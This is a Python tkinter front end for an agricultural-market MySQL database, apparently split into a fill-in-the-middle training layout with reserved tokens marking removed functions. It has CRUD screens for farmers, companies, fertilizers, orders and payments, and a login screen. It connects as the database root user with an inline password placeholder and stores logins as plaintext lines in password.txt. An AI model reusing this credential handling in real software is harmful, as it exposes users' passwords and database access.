        l = Label(root, text='Invalid Farmer_id', font=('times new roman', 15))
        l.place(x=100, y=300)
        update_farmer()
def update_command():
    """Write the edited farmer fields back; e1 still holds the key f_id."""
    try:
        sql = (
            'UPDATE farmer SET f_name=%s,f_phone_no=%s,f_mail=%s,f_locality=%s,f_address=%s WHERE f_id=%s;'
            )
        vals = e2.get(), e3.get(), e4.get(), e5.get(), e6.get(), e1.get()
        # Single row: execute() replaces the needless executemany().
        cur.execute(sql, vals)
        db.commit()
        farmer()
    except Exception:
        # Narrowed from a bare except; any failure returns to the id prompt.
        update_farmer()
def search_farmer():
    """Ask for a farmer id to look up; Search runs search()."""
    global e1
    Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato'
          ).place(x=0, y=0)
    Label(root, text='Farmer Id:', font=('Times new roman', 20), bg='tomato'
          ).place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    tk.Button(root, text='Back', font=('Arial', 15), command=farmer
              ).place(x=200, y=400)
    tk.Button(root, text='Search', font=('Arial', 15), command=search
              ).place(x=400, y=400)
def search():
    """Look up the farmer id typed in search_farmer() and display the row."""
    Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato'
          ).place(x=0, y=0)
    try:
        cur.execute('SELECT * FROM farmer WHERE f_id=%s;', [e1.get()])
        tk.Button(root, text='OK', font=('Arial', 15), command=farmer
                  ).place(x=300, y=400)
        names = ['farmer id: ', 'farmer name: ', 'farmer phone: ',
                 'farmer mail: ', 'farmer locality: ', 'farmer address: ']
        for row in cur:
            # One label per field, stacked 50px apart starting at y=50.
            for offset, (prefix, value) in enumerate(zip(names, row)):
                Label(root, text=prefix + str(value), font=(
                    'Times new roman', 20), bg='tomato'
                    ).place(x=10, y=50 + 50 * offset)
        db.commit()
    except Exception:
        # Narrowed from a bare except; bad input returns to the search prompt.
        l = Label(root, text='Invalid Farmer Id', font=('times new roman', 15))
        l.place(x=100, y=300)
        search_farmer()
def company():
    """Render the Company page: a CRUD toolbar plus the companies table."""
    global root
    Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato'
          ).place(x=0, y=0)
    Label(root, text='Company Table', font=('Times new roman', 15), bg='white'
          ).place(x=350, y=10)
    actions = [('Back', entity_page), ('Insert', insert_company),
               ('Delete', delete_company), ('Update', update_company),
               ('Search', search_company)]
    for offset, (caption, handler) in enumerate(actions):
        tk.Button(root, text=caption, font=('Arial', 15), command=handler
                  ).place(x=10 + 100 * offset, y=50)
    view_company()
def view_company():
    """Fill a scrollable Treeview with every row of the company table."""
    container = Frame(root, bd=5, relief=RIDGE, bg='tomato')
    container.place(x=10, y=100, width=750, height=400)
    h_bar = Scrollbar(container, orient=HORIZONTAL)
    v_bar = Scrollbar(container, orient=VERTICAL)
    columns = (('c_id', 'Company Id'), ('c_name', 'Company Name'),
               ('c_address', 'Company Address'))
    grid = ttk.Treeview(container, columns=tuple(cid for cid, _ in columns),
                        xscrollcommand=h_bar.set, yscrollcommand=v_bar.set)
    h_bar.pack(side=BOTTOM, fill=X)
    v_bar.pack(side=RIGHT, fill=Y)
    h_bar.config(command=grid.xview)
    v_bar.config(command=grid.yview)
    for cid, title in columns:
        grid.heading(cid, text=title)
    grid['show'] = 'headings'
    grid.column('c_id', width=100)  # narrow id column
    grid.pack()
    cur.execute('SELECT * FROM company;')
    rows = cur.fetchall()
    db.commit()
    for row in rows:
        grid.insert('', END, values=row)
def insert_company():
    """Render the blank company form; e1..e3 feed insert_company_command."""
    global e1, e2, e3, e4, e5, e6
    Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato'
          ).place(x=0, y=0)
    captions = ['Company_id', 'Company_name', 'Company_address']
    ys = [10, 110, 210]
    for caption, y in zip(captions, ys):
        Label(root, text=caption, font=('Times new roman', 20), bg='white'
              ).place(x=50, y=y)
    e1, e2, e3 = (Entry(root, width=50) for _ in range(3))
    for entry, y in zip((e1, e2, e3), ys):
        entry.place(x=350, y=y)
    tk.Button(root, text='Back', font=('Arial', 15), command=company
              ).place(x=200, y=400)
    tk.Button(root, text='Commit', font=('Arial', 15),
              command=insert_company_command).place(x=400, y=400)
def insert_company_command():
    """Validate and insert the company row built from entries e1..e3."""
    try:
        if len(e1.get()) > 3:
            # Ids longer than 3 characters are rejected via the invalid() page.
            invalid('company')
        else:
            sql = 'INSERT INTO company values(%s,%s,%s);'
            vals = e1.get(), e2.get(), e3.get()
            # Single row: execute() replaces the needless executemany().
            cur.execute(sql, vals)
            db.commit()
            company()
    except Exception:
        # Narrowed from a bare except; DB/form errors return to the blank form.
        insert_company()
def delete_company():
    """Ask for a company id to delete; Commit runs delete_company_command."""
    global e1
    Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato'
          ).place(x=0, y=0)
    Label(root, text='Company Id:', font=('Times new roman', 20), bg='tomato'
          ).place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    tk.Button(root, text='Back', font=('Arial', 15), command=company
              ).place(x=200, y=400)
    tk.Button(root, text='Commit', font=('Arial', 15),
              command=delete_company_command).place(x=400, y=400)
def delete_company_command():
    """Delete the company whose c_id was typed in delete_company()."""
    try:
        sql = 'DELETE FROM company WHERE c_id=%s;'
        # int() also rejects non-numeric input by raising ValueError.
        cur.execute(sql, [int(e1.get())])
        db.commit()
        company()
    except Exception:
        # Narrowed from a bare except; show an inline error instead of crashing.
        l = Label(root, text='Invalid Entry', font=('times new roman', 15))
        l.place(x=100, y=300)
<|reserved_special_token_0|>
def update_c():
    """Load the company picked in update_company() into an editable form."""
    try:
        global e1, e2, e3, e4, e5, e6
        Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato'
              ).place(x=0, y=0)
        cur.execute('SELECT * FROM company WHERE c_id=%s;', [e1.get()])
        captions = ['Company_id', 'Company_name', 'Company_address']
        ys = [10, 110, 210]
        for caption, y in zip(captions, ys):
            Label(root, text=caption, font=('Times new roman', 20), bg='white'
                  ).place(x=50, y=y)
        e1, e2, e3 = (Entry(root) for _ in range(3))
        # IndexError here (no matching row) is handled below as an invalid id.
        row = cur.fetchall()[0]
        entries = (e1, e2, e3)
        for entry, value in zip(entries, row):
            entry.insert(0, value)
        for entry, y in zip(entries, ys):
            entry.place(x=350, y=y)
        Button(root, text='Modify', font=('Times new roman', 20), bg='blue',
               command=update_command_c).place(x=300, y=400)
    except Exception:
        # BUG FIX: the message previously said 'Invalid Farmer_id' on the
        # company page; also narrowed from a bare except.
        l = Label(root, text='Invalid Company_id', font=('times new roman', 15))
        l.place(x=100, y=300)
        update_company()
<|reserved_special_token_0|>
def search_company():
    """Ask for a company id to look up; Search runs search_c."""
    global e1
    Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato'
          ).place(x=0, y=0)
    Label(root, text='Company Id:', font=('Times new roman', 20), bg='tomato'
          ).place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    tk.Button(root, text='Back', font=('Arial', 15), command=company
              ).place(x=200, y=400)
    tk.Button(root, text='Search', font=('Arial', 15), command=search_c
              ).place(x=400, y=400)
def search_c():
    """Look up the company id typed in search_company() and display the row."""
    Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato'
          ).place(x=0, y=0)
    try:
        cur.execute('SELECT * FROM company WHERE c_id=%s;', [e1.get()])
        tk.Button(root, text='OK', font=('Arial', 15), command=company
                  ).place(x=300, y=400)
        names = ['company id: ', 'company name: ', 'company address: ']
        for row in cur:
            # One label per field, stacked 50px apart starting at y=50.
            for offset, (prefix, value) in enumerate(zip(names, row)):
                Label(root, text=prefix + str(value), font=(
                    'Times new roman', 20), bg='tomato'
                    ).place(x=10, y=50 + 50 * offset)
        db.commit()
    except Exception:
        # Narrowed from a bare except; bad input returns to the search prompt.
        l = Label(root, text='Invalid Company Id', font=('times new roman', 15)
            )
        l.place(x=100, y=300)
        search_company()
def fertilizer():
    """Render the Fertilizer page: a CRUD toolbar plus the fertilizers table."""
    global root
    Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato'
          ).place(x=0, y=0)
    Label(root, text='Fertilizer Table', font=('Times new roman', 15),
          bg='white').place(x=350, y=10)
    actions = [('Back', entity_page), ('Insert', insert_fer),
               ('Delete', delete_fer), ('Update', update_fer),
               ('Search', search_fer)]
    for offset, (caption, handler) in enumerate(actions):
        tk.Button(root, text=caption, font=('Arial', 15), command=handler
                  ).place(x=10 + 100 * offset, y=50)
    view_fer()
def view_fer():
    """Fill a scrollable Treeview with every row of the fertilizer table."""
    container = Frame(root, bd=5, relief=RIDGE, bg='tomato')
    container.place(x=10, y=100, width=750, height=400)
    h_bar = Scrollbar(container, orient=HORIZONTAL)
    v_bar = Scrollbar(container, orient=VERTICAL)
    columns = (('fe_formula', 'Fertilizer Formula'), ('fe_name',
               'Fertilizer name'), ('fe_content', 'Fertilizer content'),
               ('fe_price', 'Fertilizer price'), ('company_id', 'Company_id'))
    grid = ttk.Treeview(container, columns=tuple(cid for cid, _ in columns),
                        xscrollcommand=h_bar.set, yscrollcommand=v_bar.set)
    h_bar.pack(side=BOTTOM, fill=X)
    v_bar.pack(side=RIGHT, fill=Y)
    h_bar.config(command=grid.xview)
    v_bar.config(command=grid.yview)
    for cid, title in columns:
        grid.heading(cid, text=title)
    grid['show'] = 'headings'
    grid.pack()
    cur.execute('SELECT * FROM fertilizer;')
    rows = cur.fetchall()
    db.commit()
    for row in rows:
        grid.insert('', END, values=row)
<|reserved_special_token_0|>
def insert_fer_command():
    """Insert the fertilizer row assembled from form entries e1..e5."""
    try:
        sql = 'INSERT INTO fertilizer values(%s,%s,%s,%s,%s);'
        vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()
        # Single row: execute() replaces the needless executemany().
        cur.execute(sql, vals)
        db.commit()
        fertilizer()
    except Exception:
        # Narrowed from a bare except; DB/form errors return to the blank form.
        insert_fer()
def delete_fer():
    """Ask for a fertilizer formula to delete; Commit runs delete_fer_command."""
    global e1
    Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato'
          ).place(x=0, y=0)
    Label(root, text='Fertilizer formula:', font=('Times new roman', 20),
          bg='tomato').place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    tk.Button(root, text='Back', font=('Arial', 15), command=fertilizer
              ).place(x=200, y=400)
    tk.Button(root, text='Commit', font=('Arial', 15),
              command=delete_fer_command).place(x=400, y=400)
def delete_fer_command():
    """Delete the fertilizer whose formula was typed in delete_fer()."""
    try:
        sql = 'DELETE FROM fertilizer WHERE fe_formula=%s;'
        cur.execute(sql, [e1.get()])
        db.commit()
        fertilizer()
    except Exception:
        # Narrowed from a bare except; show an inline error instead of crashing.
        l = Label(root, text='Invalid Entry', font=('times new roman', 15))
        l.place(x=100, y=300)
def update_fer():
    """Prompt for the fertilizer formula to edit; OK hands off to update_fe()."""
    global e1
    Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato'
          ).place(x=0, y=0)
    Label(root, text='Fertlizer formula:', font=('Times new roman', 20),
          bg='tomato').place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    tk.Button(root, text='OK', font=('Arial', 15), command=update_fe
              ).place(x=300, y=400)
def update_fe():
    """Load the fertilizer picked in update_fer() into an editable form."""
    try:
        global e1, e2, e3, e4, e5, e6
        Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato'
              ).place(x=0, y=0)
        cur.execute('SELECT * FROM fertilizer WHERE fe_formula=%s;',
                    [e1.get()])
        captions = ['Fertlizer formula', 'Fertlizer name',
                    'Fertlizer content', 'Fertlizer price', 'comapny_id']
        ys = [10, 60, 110, 160, 210]
        for caption, y in zip(captions, ys):
            Label(root, text=caption, font=('Times new roman', 20), bg='white'
                  ).place(x=50, y=y)
        e1, e2, e3, e4, e5 = (Entry(root) for _ in range(5))
        # IndexError here (no matching row) is handled below as an invalid id.
        row = cur.fetchall()[0]
        # BUG FIX: the prefill list wrongly included e6, which this form never
        # creates — a stale/undefined widget. This table has five columns.
        entries = (e1, e2, e3, e4, e5)
        for entry, value in zip(entries, row):
            entry.insert(0, value)
        for entry, y in zip(entries, ys):
            entry.place(x=350, y=y)
        Button(root, text='Modify', font=('Times new roman', 20), bg='blue',
               command=update_command_fe).place(x=300, y=400)
    except Exception:
        # BUG FIX: the message previously said 'Invalid Farmer_id' on the
        # fertilizer page; also narrowed from a bare except.
        l = Label(root, text='Invalid Fertilizer formula', font=(
            'times new roman', 15))
        l.place(x=100, y=300)
        update_fer()
<|reserved_special_token_0|>
def search_fer():
    """Ask for a fertilizer formula to look up; Search runs search_fe."""
    global e1
    Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato'
          ).place(x=0, y=0)
    Label(root, text='Fertlizer formula:', font=('Times new roman', 20),
          bg='tomato').place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    tk.Button(root, text='Back', font=('Arial', 15), command=fertilizer
              ).place(x=200, y=400)
    tk.Button(root, text='Search', font=('Arial', 15), command=search_fe
              ).place(x=400, y=400)
def search_fe():
    """Look up the formula typed in search_fer() and display the row."""
    Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato'
          ).place(x=0, y=0)
    try:
        cur.execute('SELECT * FROM fertilizer WHERE fe_formula=%s;',
                    [e1.get()])
        tk.Button(root, text='OK', font=('Arial', 15), command=fertilizer
                  ).place(x=300, y=400)
        names = ['fertilizer formula: ', 'fertilizer name: ',
                 'fertilizer content: ', 'fertilizer price: ', 'company_id: ']
        for row in cur:
            # One label per field, stacked 50px apart starting at y=50.
            for offset, (prefix, value) in enumerate(zip(names, row)):
                Label(root, text=prefix + str(value), font=(
                    'Times new roman', 20), bg='tomato'
                    ).place(x=10, y=50 + 50 * offset)
        db.commit()
    except Exception:
        # Narrowed from a bare except; bad input returns to the search prompt.
        l = Label(root, text='Invalid Fertilizer formula', font=(
            'times new roman', 15))
        l.place(x=100, y=300)
        search_fer()
def orders():
    """Render the Orders page: a CRUD toolbar plus the orders table."""
    global root
    Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato'
          ).place(x=0, y=0)
    Label(root, text='Orders Table', font=('Times new roman', 15), bg='white'
          ).place(x=350, y=10)
    actions = [('Back', entity_page), ('Insert', insert_ord),
               ('Delete', delete_ord), ('Update', update_ord),
               ('Search', search_ord)]
    for offset, (caption, handler) in enumerate(actions):
        tk.Button(root, text=caption, font=('Arial', 15), command=handler
                  ).place(x=10 + 100 * offset, y=50)
    view_ord()
def view_ord():
    """Fill a scrollable Treeview with every row of the orders table."""
    container = Frame(root, bd=5, relief=RIDGE, bg='tomato')
    container.place(x=10, y=100, width=750, height=400)
    h_bar = Scrollbar(container, orient=HORIZONTAL)
    v_bar = Scrollbar(container, orient=VERTICAL)
    columns = (('or_id', 'Order Id'), ('or_date', 'Order Date'),
               ('or_fid', 'Ordered Farmer Id'), ('or_formula',
               'Order (item)formula'), ('or_to', 'Order to'))
    grid = ttk.Treeview(container, columns=tuple(cid for cid, _ in columns),
                        xscrollcommand=h_bar.set, yscrollcommand=v_bar.set)
    h_bar.pack(side=BOTTOM, fill=X)
    v_bar.pack(side=RIGHT, fill=Y)
    h_bar.config(command=grid.xview)
    v_bar.config(command=grid.yview)
    for cid, title in columns:
        grid.heading(cid, text=title)
    grid['show'] = 'headings'
    grid.pack()
    cur.execute('SELECT * FROM orders;')
    rows = cur.fetchall()
    db.commit()
    for row in rows:
        grid.insert('', END, values=row)
<|reserved_special_token_0|>
def insert_ord():
    """Render the blank order form; e1..e5 feed insert_ord_command."""
    global e1, e2, e3, e4, e5, e6
    Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato'
          ).place(x=0, y=0)
    captions = ['Order Id', 'Order date', 'Order FID', 'Order formula',
                'Order to']
    ys = [10, 60, 110, 160, 210]
    for caption, y in zip(captions, ys):
        Label(root, text=caption, font=('Times new roman', 20), bg='white'
              ).place(x=50, y=y)
    e1, e2, e3, e4, e5 = (Entry(root, width=50) for _ in range(5))
    for entry, y in zip((e1, e2, e3, e4, e5), ys):
        entry.place(x=350, y=y)
    e2.insert(0, datetime.now())  # pre-fill the date field with "now"
    tk.Button(root, text='Back', font=('Arial', 15), command=orders
              ).place(x=200, y=400)
    tk.Button(root, text='Commit', font=('Arial', 15),
              command=insert_ord_command).place(x=400, y=400)
def insert_ord_command():
    """Insert the order row assembled from form entries e1..e5."""
    try:
        sql = 'INSERT INTO orders values(%s,%s,%s,%s,%s);'
        vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()
        # Single row: execute() replaces the needless executemany().
        cur.execute(sql, vals)
        db.commit()
        orders()
    except Exception:
        # Narrowed from a bare except; DB/form errors return to the blank form.
        insert_ord()
def delete_ord():
    """Ask for an order id to delete; Commit runs delete_ord_command."""
    global e1
    Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato'
          ).place(x=0, y=0)
    Label(root, text='Order Id:', font=('Times new roman', 20), bg='tomato'
          ).place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    tk.Button(root, text='Back', font=('Arial', 15), command=orders
              ).place(x=200, y=400)
    tk.Button(root, text='Commit', font=('Arial', 15),
              command=delete_ord_command).place(x=400, y=400)
def delete_ord_command():
    """Delete the order whose or_id was typed in delete_ord()."""
    try:
        sql = 'DELETE FROM orders WHERE or_id=%s;'
        cur.execute(sql, [e1.get()])
        db.commit()
        orders()
    except Exception:
        # Narrowed from a bare except; show an inline error instead of crashing.
        l = Label(root, text='Invalid Entry', font=('times new roman', 15))
        l.place(x=100, y=300)
def update_ord():
    """Prompt for the order id to edit; OK hands off to update_or()."""
    global e1
    Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato'
          ).place(x=0, y=0)
    Label(root, text='Order Id:', font=('Times new roman', 20), bg='tomato'
          ).place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    tk.Button(root, text='OK', font=('Arial', 15), command=update_or
              ).place(x=300, y=400)
def update_or():
    """Fetch the order picked in update_ord() and rebuild the form pre-filled.

    Reads the order id from the global e1; on any failure (bad id, empty
    result set — data[0] raises IndexError) shows an error label and
    re-opens the id prompt.
    """
    try:
        global e1, e2, e3, e4, e5, e6
        # Screen clear.
        label = Label(root, text=' ' * 800, font=('Times new roman', 500),
            bg='tomato')
        label.place(x=0, y=0)
        sql = 'SELECT * FROM orders WHERE or_id=%s;'
        cur.execute(sql, [e1.get()])
        captions = ['Order Id', 'Order Date', 'Order f_id',
            'Order formula', 'Order to']
        for i, text in enumerate(captions):
            label = Label(root, text=text, font=('Times new roman', 20),
                bg='white')
            label.place(x=50, y=10 + 50 * i)
        e1 = Entry(root)
        e2 = Entry(root)
        e3 = Entry(root)
        e4 = Entry(root)
        e5 = Entry(root)
        data = cur.fetchall()
        # BUGFIX: the original list ended with the stale global e6, which is
        # never created on this screen (it may still hold an Entry from the
        # farmer form, or the int 0).  An order row has exactly the five
        # fields built above.
        arr = [e1, e2, e3, e4, e5]
        for count, val in enumerate(data[0]):
            arr[count].insert(0, val)
        for i, widget in enumerate(arr):
            widget.place(x=350, y=10 + 50 * i)
        label = Button(root, text='Modify', font=('Times new roman', 20),
            bg='blue', command=update_command_ord)
        label.place(x=300, y=400)
    except Exception:
        # Narrowed from a bare `except:`.
        l = Label(root, text='Invalid Order_id', font=('times new roman', 15))
        l.place(x=100, y=300)
        update_ord()
def update_command_ord():
    """Write the edited order fields (e2-e5) back to the row keyed by e1.

    ROBUSTNESS: the original had no error handling, so a bad value simply
    crashed the tkinter callback; mirror the sibling update_command() and
    re-open the id prompt on failure.
    """
    sql = (
        'UPDATE orders SET or_date=%s,or_fid=%s,or_formula=%s,or_to=%s WHERE or_id=%s;'
        )
    vals = e2.get(), e3.get(), e4.get(), e5.get(), e1.get()
    try:
        # Single row: execute() instead of executemany() over a 1-list.
        cur.execute(sql, vals)
        db.commit()
        orders()
    except Exception:
        update_ord()
def search_ord():
    """Prompt for an order id to look up; Search hands off to search_or()."""
    global e1
    # Screen clear.
    label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
        'tomato')
    label.place(x=0, y=0)
    label = Label(root, text='Order Id:', font=('Times new roman', 20), bg=
        'tomato')
    label.place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    Button = tk.Button(root, text='Back', font=('Arial', 15), command=orders)
    Button.place(x=200, y=400)
    Button = tk.Button(root, text='Search', font=('Arial', 15), command=
        search_or)
    Button.place(x=400, y=400)
def search_or():
    """Look up one order by the id typed in e1 and show its fields as labels.

    Falls back to search_ord() with an error label on any failure.
    """
    # Screen clear.
    label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
        'tomato')
    label.place(x=0, y=0)
    try:
        sql = 'SELECT * FROM orders WHERE or_id=%s;'
        cur.execute(sql, [e1.get()])
        Button = tk.Button(root, text='OK', font=('Arial', 15), command=orders)
        Button.place(x=300, y=400)
        names = ['order Id: ', 'Order date: ', 'Order fid: ',
            'Order formula: ', 'order to: ']
        for row in cur:
            # One caption+value label per column, stacked 50 px apart.
            for count, (name, value) in enumerate(zip(names, row)):
                label = Label(root, text=name + str(value), font=(
                    'Times new roman', 20), bg='tomato')
                label.place(x=10, y=50 + 50 * count)
        db.commit()
    except Exception:
        # Narrowed from a bare `except:`.
        l = Label(root, text='Invalid order id', font=('times new roman', 15))
        l.place(x=100, y=300)
        search_ord()
def payment():
    """Payment-table screen: toolbar of CRUD buttons plus the table view."""
    global root
    # Screen clear over the previous view.
    label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
        'tomato')
    label.place(x=0, y=0)
    label = Label(root, text='Payment Table', font=('Times new roman', 15),
        bg='white')
    label.place(x=350, y=10)
    Button = tk.Button(root, text='Back', font=('Arial', 15), command=
        entity_page)
    Button.place(x=10, y=50)
    Button = tk.Button(root, text='Insert', font=('Arial', 15), command=
        insert_pay)
    Button.place(x=110, y=50)
    Button = tk.Button(root, text='Delete', font=('Arial', 15), command=
        delete_pay)
    Button.place(x=210, y=50)
    # NOTE(review): update_pay / search_pay are defined elsewhere in the file.
    Button = tk.Button(root, text='Update', font=('Arial', 15), command=
        update_pay)
    Button.place(x=310, y=50)
    Button = tk.Button(root, text='Search', font=('Arial', 15), command=
        search_pay)
    Button.place(x=410, y=50)
    view_pay()
def view_pay():
    """Render all rows of the `payment` table in a scrollable Treeview."""
    frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')
    frame.place(x=10, y=100, width=750, height=400)
    x_scroll = Scrollbar(frame, orient=HORIZONTAL)
    y_scroll = Scrollbar(frame, orient=VERTICAL)
    table = ttk.Treeview(frame, columns=('trans_id', 'p_f_id', 'p_date',
        'p_amount', 'p_method'), xscrollcommand=x_scroll.set,
        yscrollcommand=y_scroll.set)
    x_scroll.pack(side=BOTTOM, fill=X)
    y_scroll.pack(side=RIGHT, fill=Y)
    x_scroll.config(command=table.xview)
    y_scroll.config(command=table.yview)
    table.heading('trans_id', text='Transaction Id')
    table.heading('p_f_id', text='Farmer Id')
    table.heading('p_date', text='Payment Date')
    table.heading('p_amount', text='Amount')
    table.heading('p_method', text='Payment Method')
    # Hide the implicit first tree column; show only the headings above.
    table['show'] = 'headings'
    table.pack()
    cur.execute('SELECT * FROM payment;')
    data = cur.fetchall()
    db.commit()
    if len(data) != 0:
        for row in data:
            table.insert('', END, values=row)
<|reserved_special_token_0|>
def insert_pay():
    """Build the payment-insert form.

    e1-e4 are text entries (the date field e3 is pre-filled with "now");
    the payment method e5 is a StringVar driven by an OptionMenu.
    Commit fires insert_pay_command().
    """
    global e1, e2, e3, e4, e5, e6
    # Screen clear.
    label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
        'tomato')
    label.place(x=0, y=0)
    label = Label(root, text='Transaction Id', font=('Times new roman', 20),
        bg='white')
    label.place(x=50, y=10)
    label = Label(root, text='Transaction farmer id', font=(
        'Times new roman', 20), bg='white')
    label.place(x=50, y=60)
    label = Label(root, text='Transaction date', font=('Times new roman',
        20), bg='white')
    label.place(x=50, y=110)
    label = Label(root, text='Transaction amount', font=('Times new roman',
        20), bg='white')
    label.place(x=50, y=160)
    label = Label(root, text='Transaction method', font=('Times new roman',
        20), bg='white')
    label.place(x=50, y=210)
    e1 = Entry(root, width=50)
    e2 = Entry(root, width=50)
    e3 = Entry(root, width=50)
    e4 = Entry(root, width=50)
    e1.place(x=350, y=10)
    e2.place(x=350, y=60)
    e3.place(x=350, y=110)
    e3.insert(0, datetime.now())
    e4.place(x=350, y=160)
    # DEAD-CODE FIX: the original also created an unplaced Entry bound to e5
    # and immediately rebound the name to this StringVar; the Entry was
    # never used or shown.
    e5 = StringVar(root)
    e5.set('Debit card')
    w = OptionMenu(root, e5, 'Credit Card', 'UPI', 'Cheque', 'Cash')
    w.place(x=350, y=210)
    Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)
    Button.place(x=200, y=400)
    Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
        insert_pay_command)
    Button.place(x=400, y=400)
def insert_pay_command():
    """Insert one payment row from e1-e5 (e5 is the OptionMenu StringVar).

    Re-opens the insert form on any failure.
    """
    try:
        sql = 'INSERT INTO payment values(%s,%s,%s,%s,%s);'
        vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()
        # Single row: execute() instead of executemany() over a 1-list.
        cur.execute(sql, vals)
        db.commit()
        payment()
    except Exception:
        # Narrowed from a bare `except:`.
        insert_pay()
def delete_pay():
    """Prompt for a transaction id to delete; Commit fires delete_pay_command()."""
    global e1
    # Screen clear.
    label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
        'tomato')
    label.place(x=0, y=0)
    label = Label(root, text='Transaction Id:', font=('Times new roman', 20
        ), bg='tomato')
    label.place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)
    Button.place(x=200, y=400)
    Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
        delete_pay_command)
    Button.place(x=400, y=400)
def delete_pay_command():
    """Delete the payment whose trans_id is typed in e1; label errors instead
    of crashing the callback."""
    try:
        sql = 'DELETE FROM payment WHERE trans_id=%s;'
        cur.execute(sql, [e1.get()])
        db.commit()
        payment()
    except Exception:
        # Narrowed from a bare `except:`.
        l = Label(root, text='Invalid Entry', font=('times new roman', 15))
        l.place(x=100, y=300)
<|reserved_special_token_0|>
def search_pay():
    """Prompt for a transaction id to look up; Search hands off to search_pa.

    NOTE(review): search_pa is defined elsewhere in the file (not visible in
    this chunk) — verify it exists.
    """
    global e1
    # Screen clear.
    label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
        'tomato')
    label.place(x=0, y=0)
    label = Label(root, text='Transaction Id:', font=('Times new roman', 20
        ), bg='tomato')
    label.place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)
    Button.place(x=200, y=400)
    Button = tk.Button(root, text='Search', font=('Arial', 15), command=
        search_pa)
    Button.place(x=400, y=400)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
#! /usr/bin/python3
import pprint
import tkinter as tk
from tkinter import messagebox
from PIL import Image
from tkinter import *
from prettytable import PrettyTable
import ttk
import os
import subprocess
import mysql.connector
from datetime import datetime
import time
db=mysql.connector.connect(host='localhost',user='root',passwd='PASSWORD',database='DATABASENAME')
cur=db.cursor()
root=Tk()
root.title("WELCOME TO AGRI MARKET")
#stored procedure
"""
DELIMITER $$
CREATE PROCEDURE getMonth(
IN month VARCHAR(2))
BEGIN
SELECT * FROM payment
WHERE p_date LIKE CONCAT('____-',month,'%');
END$$
DELIMITER ;
"""
T1,T2,T3=0,0,0
def First_page(root):
    """Login screen: username/password entries, LogIn button, Register link.

    Stores the entry widgets in the module globals T1/T2 so check_pass()
    and create_pass() can read them later.
    """
    global T1,T2,T3
    frame=Frame(root,height=500,width=800,bg='ivory')
    frame.pack()
    label=Label(root,text='WELCOME TO AGRI MARKET',font=('Times new roman',25))
    label.place(x=200,y=50)
    button=Button(root,text='LogIn',font=('times new roman',20),command=check_pass,bg='green')
    button.place(x=350,y=350)
    L1 = tk.Label(root, text="Username", font=("Arial Bold", 15), bg='ivory')
    L1.place(x=150, y=200)
    T1 = tk.Entry(root, width = 30, bd = 5)
    T1.place(x=280, y=200)
    L2 = tk.Label(root, text="Password", font=("Arial Bold", 15), bg='ivory')
    L2.place(x=150, y=250)
    # show='*' masks the password characters.
    T2 = tk.Entry(root, width = 30, show='*', bd = 5)
    T2.place(x=280, y=250)
    reg_button=Button(root,text='Register',font=("Arial Bold",15),bg='blue',command=create_pass)
    reg_button.place(x=340,y=400)
def check_pass():
    """Validate the login form against password.txt (one 'user=pass' per line).

    Opens the entity page on success, otherwise shows an error label.
    """
    global root,T1,T2,T3
    try:
        with open('password.txt','r') as f:
            creds = f.read().splitlines()
        # BUGFIX: the original did a substring test against the whole file,
        # so e.g. user 'ab' / password 'c' would log in whenever any stored
        # line merely *contained* 'ab=c' (say, user 'xab' password 'cd').
        # Compare against whole credential lines instead.
        if T1.get() != '' and T2.get() != '' and T1.get() + '=' + T2.get() in creds:
            entity_page()
        else:
            label=Label(root,text='Invalid username or password.Try again',font=('times new roman',15))
            label.place(x=200,y=100)
    except OSError:
        # password.txt missing/unreadable — treat as a failed login, same as
        # the original, but without swallowing unrelated exceptions.
        label=Label(root,text='Invalid username or password.Try again',font=('times new roman',15))
        label.place(x=200,y=100)
def create_pass():
    """Registration screen: username, password and confirmation entries.

    Done fires add_pass(), which checks T2 == T3 and appends the credential.
    """
    global root,T1,T2,T3
    #to clean up previous window
